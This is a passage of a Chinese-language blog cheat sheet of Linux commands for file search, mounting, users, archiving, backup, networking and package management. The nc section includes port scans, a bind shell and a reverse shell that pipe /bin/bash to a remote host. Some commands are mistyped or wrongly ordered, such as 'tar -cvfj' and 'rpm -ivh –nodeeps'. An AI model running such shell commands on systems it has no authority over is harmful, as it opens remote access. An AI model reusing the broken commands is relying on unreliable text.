<li><p>搜索在过去100天内未被使用过的执行文件 </p>
<p>find &#x2F;usr&#x2F;bin -type f -atime +100  </p>
</li>
<li><p>搜索在10天内被创建或者修改过的文件 </p>
<p> find &#x2F;usr&#x2F;bin -type f -mtime -10 </p>
</li>
<li><p>搜索以 ‘.rpm’ 结尾的文件并定义其权限 </p>
<p>find &#x2F; -name *.rpm -exec chmod 755 ‘{}’ ; </p>
</li>
<li><p>搜索以 ‘.rpm’ 结尾的文件，忽略光驱、捷盘等可移动设备  </p>
<p>find &#x2F; -xdev -name *.rpm </p>
</li>
<li><p>显示一个二进制文件、源码或man的位置  </p>
<p>whereis halt </p>
</li>
<li><p>显示一个二进制文件或可执行文件的完整路径 </p>
<p>which halt</p>
</li>
</ul>
<h2 id="9-3-locate"><a href="#9-3-locate" class="headerlink" title="9.3 locate"></a>9.3 locate</h2><p>寻找以 ‘.ps’ 结尾的文件 - 先运行 ‘updatedb’ 命令  locate *.ps </p>
<h1 id="10-挂载"><a href="#10-挂载" class="headerlink" title="10.挂载"></a>10.挂载</h1><h2 id="10-1-mount"><a href="#10-1-mount" class="headerlink" title="10.1 mount"></a>10.1 mount</h2><p>挂载一个叫做hda2的盘到&#x2F;mnt&#x2F;hda2路径 mount &#x2F;dev&#x2F;hda2 &#x2F;mnt&#x2F;hda2<br>其他挂载上同</p>
<h2 id="10-2-umount"><a href="#10-2-umount" class="headerlink" title="10.2 umount"></a>10.2 umount</h2><p>卸载一个叫做hda2的盘 - 先从挂载点 ‘&#x2F; mnt&#x2F;hda2’ 退出  umount &#x2F;dev&#x2F;hda2<br>当设备繁忙时强制卸载   fuser -km &#x2F;mnt&#x2F;hda2<br>运行卸载操作而不写入 &#x2F;etc&#x2F;mtab 文件- 当文件为只读或当磁盘写满时非常有用  umount -n &#x2F;mnt&#x2F;hda2 </p>
<h1 id="11-用户和群组"><a href="#11-用户和群组" class="headerlink" title="11.用户和群组"></a>11.用户和群组</h1><ul>
<li><p>创建一个新用户组 </p>
<p>groupadd group_name </p>
</li>
<li><p>删除一个用户组 </p>
<p>groupdel group_name</p>
</li>
<li><p>创建一个新用户 </p>
<p>useradd user1 </p>
</li>
<li><p>删除一个用户  </p>
<p>userdel -r user1</p>
</li>
<li><p>重命名一个用户组 </p>
<p>groupmod -n new_group_name old_group_name</p>
</li>
<li><p>创建一个属于 “admin” 用户组的用户 </p>
<p>useradd -c “Name Surname “ -g admin -d &#x2F;home&#x2F;user1 -s &#x2F;bin&#x2F;bash user1 </p>
</li>
<li><p>修改用户属性  </p>
<p>usermod -c “User FTP” -g system -d &#x2F;ftp&#x2F;user1 -s &#x2F;bin&#x2F;nologin user1 </p>
</li>
<li><p>修改口令  </p>
<p>passwd </p>
</li>
<li><p>修改一个用户的口令 (只允许root执行)  </p>
<p>passwd user1 </p>
</li>
<li><p>设置用户口令的失效期限  </p>
<p>chage -E 2005-12-31 user1 </p>
</li>
<li><p>检查 ‘&#x2F;etc&#x2F;passwd’ 的文件格式和语法修正以及存在的用户  </p>
<p>pwck </p>
</li>
<li><p>检查 ‘&#x2F;etc&#x2F;passwd’ 的文件格式和语法修正以及存在的群组 </p>
<p>grpck </p>
</li>
<li><p>用户账号密码输入次数过多锁定后解除(清除错误次数)</p>
<p>pam_tally2 -u root -r</p>
</li>
</ul>
<h1 id="12-打包和压缩"><a href="#12-打包和压缩" class="headerlink" title="12.打包和压缩"></a>12.打包和压缩</h1><h2 id="12-1-rar"><a href="#12-1-rar" class="headerlink" title="12.1 rar"></a>12.1 rar</h2><ul>
<li><p>创建一个叫做 ‘file1.rar’ 的包  </p>
<p>rar a file1.rar test_file </p>
</li>
<li><p>同时压缩 ‘file1’, ‘file2’ 以及目录 ‘dir1’  </p>
<p>rar a file1.rar file1 file2 dir1 </p>
</li>
<li><p>解压rar包  </p>
<p>rar x file1.rar、 unrar x file1.rar</p>
</li>
<li><p>创建一个非压缩的 tar包  </p>
<p>tar -cvf archive.tar file1 </p>
</li>
<li><p>释放一个包  </p>
<p>tar -xvf archive.tar </p>
</li>
<li><p>将压缩包释放到 &#x2F;tmp目录下 </p>
<p>tar -xvf archive.tar -C &#x2F;tmp </p>
</li>
<li><p>创建一个bzip2格式的压缩包 </p>
<p> tar -cvfj archive.tar.bz2 dir1 </p>
</li>
<li><p>解压一个bzip2格式的压缩包  </p>
<p>tar -jxvf archive.tar.bz2 </p>
</li>
<li><p>创建一个gzip格式的压缩包  </p>
<p>tar -cvfz archive.tar.gz dir1 </p>
</li>
<li><p>解压一个gzip格式的压缩包  </p>
<p>tar -zxvf archive.tar.gz</p>
</li>
</ul>
<h2 id="12-2-zip"><a href="#12-2-zip" class="headerlink" title="12.2 zip"></a>12.2 zip</h2><ul>
<li><p>创建一个zip格式的压缩包  </p>
<p>zip file1.zip file1 </p>
</li>
<li><p>将几个文件和目录同时压缩成一个zip格式的压缩包  </p>
<p>zip -r file1.zip file1 file2 dir1 </p>
</li>
<li><p>解压一个zip格式压缩包  </p>
<p>unzip file1.zip </p>
</li>
<li><p>压缩一个叫做 ‘file1’的文件 </p>
<p> gzip file1 </p>
</li>
<li><p>最大程度压缩  </p>
<p>gzip -9 file1</p>
</li>
</ul>
<h1 id="13-备份"><a href="#13-备份" class="headerlink" title="13.备份"></a>13.备份</h1><ul>
<li><p>制作一个 ‘&#x2F;home’ 目录的完整备份 </p>
<p>dump -0aj -f &#x2F;tmp&#x2F;home0.bak &#x2F;home </p>
</li>
<li><p>制作一个 ‘&#x2F;home’ 目录的交互式备份  </p>
<p>dump -1aj -f &#x2F;tmp&#x2F;home0.bak &#x2F;home </p>
</li>
<li><p>还原一个交互式备份  </p>
<p>restore -if &#x2F;tmp&#x2F;home0.bak </p>
</li>
<li><p>通过ssh和压缩将一个远程目录同步到本地目录  </p>
<p>rsync -az -e ssh –delete ip_addr:&#x2F;home&#x2F;public &#x2F;home&#x2F;local </p>
</li>
<li><p>通过ssh和压缩将本地目录同步到远程目录 </p>
<p>rsync -az -e ssh –delete &#x2F;home&#x2F;local ip_addr:&#x2F;home&#x2F;public  </p>
</li>
<li><p>备份磁盘内容到一个文件  </p>
<p>dd if&#x3D;&#x2F;dev&#x2F;sda of&#x3D;&#x2F;tmp&#x2F;file1 </p>
</li>
<li><p>日常备份文件带当前日期</p>
<p>mv &#x2F;tmp&#x2F;1.txt &#x2F;tmp&#x2F;1.txt.bak.`date +%F_%T`</p>
</li>
</ul>
<h1 id="14-网络"><a href="#14-网络" class="headerlink" title="14.网络"></a>14.网络</h1><h2 id="14-1-nc"><a href="#14-1-nc" class="headerlink" title="14.1 nc"></a>14.1 nc</h2><p>-g&lt;网关&gt; 设置路由器跃程通信网关，最多可设置8个。<br>-G&lt;指向器数目&gt; 设置来源路由指向器，其数值为4的倍数。<br>-h 在线帮助。<br>-i&lt;延迟秒数&gt; 设置时间间隔，以便传送信息及扫描通信端口。<br>-l 使用监听模式，管控传入的资料。<br>-n 直接使用IP地址，而不通过域名服务器。<br>-o&lt;输出文件&gt; 指定文件名称，把往来传输的数据以16进制字码输出该文件保存。<br>-p&lt;通信端口&gt; 设置本地主机使用的通信端口。<br>-r 乱数指定本地与远端主机的通信端口。<br>-s&lt;来源位址&gt; 设置本地主机送出数据包的IP地址。<br>-u 使用UDP传输协议。<br>-v 显示指令执行过程。<br>-w&lt;超时秒数&gt; 设置等待连线的时间。<br>-z 使用0输入&#x2F;输出模式，只在扫描通信端口时使用。</p>
<h3 id="14-1-1-端口扫描，测试端口"><a href="#14-1-1-端口扫描，测试端口" class="headerlink" title="14.1.1 端口扫描，测试端口"></a>14.1.1 端口扫描，测试端口</h3><ul>
<li><p>tcp</p>
<p>nc -v -z -w 2 192.168.0.3 1-100 </p>
</li>
<li><p>udp</p>
<p>nc -u -v -z -w 2 192.168.0.3 1-100</p>
</li>
</ul>
<h3 id="14-1-2-远程拷贝文件"><a href="#14-1-2-远程拷贝文件" class="headerlink" title="14.1.2 远程拷贝文件"></a>14.1.2 远程拷贝文件</h3><p>server1 拷贝文件到server2<br>1：需要先在server2，用nc激活监听<br>    【server2】       nc -l 1234  &gt;1234.txt<br>    【server1】       nc -w 1 192.168.1.1 1234 &lt; abc.txt</p>
<h3 id="14-1-3-克隆设备"><a href="#14-1-3-克隆设备" class="headerlink" title="14.1.3 克隆设备"></a>14.1.3 克隆设备</h3><p>【server】    dd if&#x3D; &#x2F;dev&#x2F;sda | nc -l 20000<br>【client 】      nc -n 192.168.1.1 20000 | dd of&#x3D;&#x2F;dev&#x2F;sda</p>
<h3 id="14-1-4-打开shell"><a href="#14-1-4-打开shell" class="headerlink" title="14.1.4 打开shell"></a>14.1.4 打开shell</h3><p>【server】    nc -l 20000 -e &#x2F;bin&#x2F;bash -i<br>【client 】    nc 192.168.1.1 20000</p>
<h3 id="14-1-5-反向shell"><a href="#14-1-5-反向shell" class="headerlink" title="14.1.5 反向shell"></a>14.1.5 反向shell</h3><p>【server】    nc -l 20000<br>【client 】    nc 192.168.1.1 20000 -e &#x2F;bin&#x2F;bash</p>
<h2 id="14-2-arpwatch"><a href="#14-2-arpwatch" class="headerlink" title="14.2 arpwatch"></a>14.2 arpwatch</h2><p>监听网络上ARP的记录</p>
<p>-d 启动排错模式。<br>-f&lt;记录文件&gt; 设置存储ARP记录的文件，预设为&#x2F;var&#x2F;arpwatch&#x2F;arp.dat。<br>-i&lt;接口&gt; 指定监听ARP的接口，预设的接口为eth0。<br>-r&lt;记录文件&gt; 从指定的文件中读取ARP记录，而不是从网络上监听。<br>-n 指定附加的本地网络<br>-u 指定用户和用户组<br>-e 发送邮件给指定用户，非默认的root用户<br>-s 指定用户名作为返回地址，而不是默认的用户root</p>
<h2 id="14-3-route"><a href="#14-3-route" class="headerlink" title="14.3 route"></a>14.3 route</h2><p>直接在命令行下执行route命令来添加路由，不会永久保存，当网卡重启或者机器重启之后，该路由就失效了；可以在&#x2F;etc&#x2F;rc.local中添加route命令来设置路由永久有效。</p>
<p>add：增加路由记录</p>
<p>del：删除路由记录</p>
<p>target：目的网络或目的主机</p>
<p>gw：设置默认网关</p>
<p>mss：设置TCP的最大区块长度（MSS），单位MB</p>
<p>window：指定通过路由表的TCP连接的TCP窗口大小</p>
<p>dev：路由记录所表示的网络接口</p>
<ul>
<li><p>查看路由信息  </p>
<p>route -n</p>
</li>
<li><p>添加路由  </p>
<p>route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.139.128.1 dev eth0</p>
</li>
<li><p>删除路由   </p>
<p>route del -net 224.0.0.0 netmask 240.0.0.0</p>
</li>
<li><p>删除和添加默认路由 </p>
<p> route add default gw 192.168.1.1      route del default gw 192.168.1.1</p>
</li>
</ul>
<h2 id="14-4-ethtool"><a href="#14-4-ethtool" class="headerlink" title="14.4 ethtool"></a>14.4 ethtool</h2><ul>
<li><p>查看端口是否up  </p>
<p>ethtool eth0</p>
</li>
<li><p>查看网卡驱动程序   </p>
<p>ethtool -i eth0</p>
</li>
<li><p>网卡自检   </p>
<p>ethtool -t eth0</p>
</li>
<li><p>接口闪灯判定网卡对应名称位置  </p>
<p>ethtool -p eth0</p>
</li>
</ul>
<h2 id="14-5-tcpdump"><a href="#14-5-tcpdump" class="headerlink" title="14.5 tcpdump"></a>14.5 tcpdump</h2><p>TCPDump可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息。</p>
<p> 参数较多，不一一罗列了，举一些常用的例子，如下:</p>
<ul>
<li><p>监听指定网卡的所有传输数据 </p>
<p>tcpdump -i eth0 -nnvv</p>
</li>
<li><p>捕获特定主机经过本机网卡eth0的所有数据包 </p>
<p>tcpdump -i eth0 host x.x.x.x -nnvv</p>
</li>
<li><p>监听udp的53端口的数据包  </p>
<p>tcpdump udp port 53 -nnvv</p>
</li>
<li><p>捕获主机A接收和发出的tcp协议的ssh的数据包 </p>
<p>tcpdump tcp port 22 and host x.x.x.x -nnvv</p>
</li>
<li><p>捕获主机 A 和主机B或主机C的所有通信数据包 </p>
<p>tcpdump hostx.x.x.x and (x.x.x.x or x.x.x.x )  -nnvv</p>
</li>
<li><p>捕获源主机1.1.1.1且源端口为443到目的主机2.2.2.2主机的通信 </p>
<p>tcpdump src host 1.1.1.1 amd src port 443 and dst host 2.2.2.2 and dst port 443</p>
</li>
<li><p>抓包文件输出至指定文件  </p>
<p>tcpdump -i eth0 -w &#x2F;home&#x2F;capture.pcap</p>
</li>
<li><p>获取主机A除了和主机B之外所有主机通信的ip包 </p>
<p>tcpdump ip host A.x.x.x and ! B.x.x.x</p>
</li>
</ul>
<h1 id="15-安装包管理"><a href="#15-安装包管理" class="headerlink" title="15.安装包管理"></a>15.安装包管理</h1><h2 id="15-1-rpm"><a href="#15-1-rpm" class="headerlink" title="15.1 rpm"></a>15.1 rpm</h2><ul>
<li><p>安装一个rpm包 </p>
<p>rpm -ivh package.rpm </p>
</li>
<li><p>安装一个rpm包而忽略依赖关系警告 </p>
<p>rpm -ivh –nodeeps package.rpm </p>
</li>
<li><p>更新一个rpm包但不改变其配置文件  </p>
<p>rpm -U package.rpm </p>
</li>
<li><p>删除一个rpm包  </p>
<p>rpm -e package_name.rpm </p>
</li>
<li><p>显示系统中所有已经安装的rpm包  </p>
<p>rpm -qa </p>
</li>
<li><p>确认一个rpm包的完整性  </p>
<p>rpm –checksig package.rpm </p>
</li>
<li><p>确认一个rpm包还未安装  </p>
<p>rpm -Vp package.rpm</p>
</li>
</ul>
<h2 id="15-2-deb"><a href="#15-2-deb" class="headerlink" title="15.2 deb"></a>15.2 deb</h2><ul>
<li><p>安装&#x2F;更新一个 deb 包  </p>
<p>dpkg -i package.deb </p>
</li>
<li><p>从系统删除一个 deb 包  </p>
<p>dpkg -r package_name </p>
</li>
<li><p>显示系统中所有已经安装的 deb 包  </p>
<p>dpkg -l </p>
</li>
<li><p>显示所有名称中包含 “httpd” 字样的deb包  </p>
<p>dpkg -l | grep httpd </p>
</li>
<li><p>显示系统中已经安装的一个deb包所提供的文件列表  </p>
<p>dpkg -L package_name </p>
</li>
<li><p>确认所给的文件由哪个deb包提供  </p>
<p>dpkg -S &#x2F;bin&#x2F;ping</p>
</li>
</ul>
<h2 id="15-3-yum"><a href="#15-3-yum" class="headerlink" title="15.3 yum"></a>15.3 yum</h2><ul>
<li><p>下载并安装一个rpm包 </p>
<p>yum install package_name </p>
</li>
<li><p>安装一个rpm包，使用你自己的软件仓库为你解决所有依赖关系  </p>
<p>yum localinstall package_name.rpm </p>
</li>
<li><p>更新当前系统中所有安装的rpm包  </p>
<p>yum update package_name.rpm </p>
</li>
<li><p>更新一个rpm包  </p>
<p>yum update package_name </p>
</li>
<li><p>删除一个rpm包  </p>
<p>yum remove package_name </p>
</li>
<li><p>列出当前系统中安装的所有包  </p>
<p>yum list </p>
</li>
<li><p>在rpm仓库中搜寻软件包  </p>
<p>yum search package_name </p>
</li>
<li><p>清理rpm缓存删除下载的包  </p>
<p>yum clean packages </p>
</li>
<li><p>删除所有头文件  </p>
<p>yum clean headers </p>
</li>
<li><p>删除所有缓存的包和头文件 </p>
<p>yum clean all</p>
</li>
</ul>
<h2 id="15-4-apt"><a href="#15-4-apt" class="headerlink" title="15.4 apt"></a>15.4 apt</h2><ul>
<li><p>安装&#x2F;更新一个 deb 包  </p>
<p>apt-get install package_name </p>
</li>
<li><p>从光盘安装&#x2F;更新一个 deb 包  </p>
<p>apt-cdrom install package_name </p>
</li>
<li><p>升级列表中的软件包  </p>
<p>apt-get update </p>
</li>
<li><p>升级所有已安装的软件  </p>
<p>apt-get upgrade </p>
</li>
<li><p>从系统删除一个deb包  </p>
<p>apt-get remove package_name </p>
</li>
<li><p>确认依赖的软件仓库正确  </p>
<p>apt-get check </p>
</li>
<li><p>从下载的软件包中清理缓存 </p>
<p>apt-get clean </p>
</li>
<li><p>查找包含所要搜索字符串的软件包名称  </p>
<p>apt-cache search searched-package</p>
</li>
</ul>

                    </article>

                    <!-- blog -->
                    <div class="row">
                        <div class="col-lg-12">
                            <!-- title -->
                            <h5 class="trm-mb-40 trm-title-with-divider">
                                Other Articles
                                <span data-number="02"></span>
                            </h5>
                        </div>
                        
                            <div class="col-lg-6">
    <div class="trm-blog-card trm-scroll-animation" data-scroll data-scroll-offset="40">
        <a href="https://www.leagsoft.top/2022/07/31/hello-world/" class="trm-cover-frame trm-anima-link">
            <img src="https://www.leagsoft.top/img/block.jpg" alt="cover">
        </a>
        <div class="trm-card-descr">
            <div class="trm-label trm-category trm-mb-20">
                <a href=" https://www.leagsoft.top/categories/%E8%AE%B0%E5%BD%95/">
                    记录
                </a>
            </div>
            <h5>
                <a href="https://www.leagsoft.top/2022/07/31/hello-world/" class="trm-anima-link">
                    Hello World
                </a>
            </h5>
            <div class="trm-divider trm-mb-20 trm-mt-20"></div>
            <ul class="trm-card-data trm-label">
                <li>
                    07/31
                </li>
                <li>
                    07:01
                </li>
                <li>
                    75
                </li>
            </ul>
        </div>
    </div>
</div>
                        
                        
                    </div>
                    <!-- blog end -->

                    

                    <div class="trm-divider trm-mb-40"></div>

                    <!-- footer -->
                    <footer class="trm-scroll-animation" data-scroll data-scroll-offset="50">
    <div class="trm-label">
        ©  2022- 2022 ·
        <span class="trm-accent-color">
            一根儿狗
        </span>
    </div>
    <div class="trm-label">
        The blog has been lovely to run:
        <span id="since" class="trm-accent-color"></span>
        day
    </div>
</footer>
<script>
    function show_date_time () {
        BirthDay = new Date("07/27/2022 17:00:00");
        today = new Date();
        timeold = (today.getTime() - BirthDay.getTime());
        msPerDay = 24 * 60 * 60 * 1000
        day = Math.floor(timeold / msPerDay)
        since.innerHTML = day
    }
    show_date_time()
</script>
                    <!-- footer end -->
                </div>
                <!-- content end -->
            </div>
        </div>
    </div>
</div>


    
  
  
            <!-- body end -->
          </div>
        </div>
      </div>
      <!-- scroll container end -->

      <!-- mode switcher -->
      <div class="trm-hidden-switcher">
        <div class="trm-mode-switcher"><i class="far fa-sun"></i>
          <input class="tgl tgl-light" id="trm-swich" type="checkbox">
          <label class="trm-swich" for="trm-swich"></label>
          <i class="far fa-moon"></i>
        </div>
      </div>
      <!-- mode switcher end -->

  </div>
  <!-- app wrapper end -->

  
<script src="https://www.leagsoft.top/js/plugins/jquery.min.js"></script>
<script src="https://www.leagsoft.top/js/plugins/swup.min.js"></script>
<script src="https://www.leagsoft.top/js/plugins/locomotive-scroll.js"></script>
<script src="https://www.leagsoft.top/js/plugins/typing.js"></script>
<script src="https://www.leagsoft.top/js/plugins/fancybox.min.js"></script>
<script src="https://www.leagsoft.top/js/plugins/swiper.min.js"></script>


<!-- 评论插件 -->


<!-- Service Worker -->


<script src="https://www.leagsoft.top/js/main.js?v=1.0.2"></script>


</body>

</html>